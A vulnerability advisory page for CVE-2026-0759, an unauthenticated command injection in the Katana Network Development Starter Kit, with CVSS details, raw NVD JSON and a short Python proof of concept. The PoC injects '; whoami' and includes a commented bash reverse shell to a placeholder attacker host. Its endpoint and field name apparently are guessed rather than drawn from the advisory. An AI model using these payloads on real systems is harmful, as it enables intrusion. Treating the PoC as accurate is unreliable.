Security Vulnerability Report
中文
CVE-2026-0759 CVSS 9.8 CRITICAL

CVE-2026-0759

Published: 2026-01-23 04:16:03
Last Modified: 2026-04-15 00:35:42

Description

Katana Network Development Starter Kit executeCommand Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Katana Network Development Starter Kit. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the executeCommand method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27786.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Katana Network Development Starter Kit 所有已知版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-0759 PoC - Command Injection in Katana Network Development Starter Kit # Target: Katana Network Development Starter Kit executeCommand endpoint target_url = "http://target:8080/api/executeCommand" # Malicious payload to inject OS command # Using command chaining to execute arbitrary command payload = { "command": "; whoami > /tmp/pwned.txt" } try: response = requests.post(target_url, json=payload, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") # Reverse Shell Payload Example # payload = {"command": "; bash -i >& /dev/tcp/attacker_ip/port 0>&1"} # requests.post(target_url, json=payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0759", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:02.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Katana Network Development Starter Kit executeCommand Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Katana Network Development Starter Kit. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of the executeCommand method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27786."}, {"lang": "es", "value": "Vulnerabilidad de inyección de comandos y ejecución remota de código executeCommand en Katana Network Development Starter Kit. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de Katana Network Development Starter Kit. La autenticación no es necesaria para explotar esta vulnerabilidad.\n\nLa falla específica existe en la implementación del método executeCommand. El problema resulta de la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar una llamada al sistema. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto de la cuenta de servicio. Fue ZDI-CAN-27786."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-025/", "source": "[email protected]"}]}}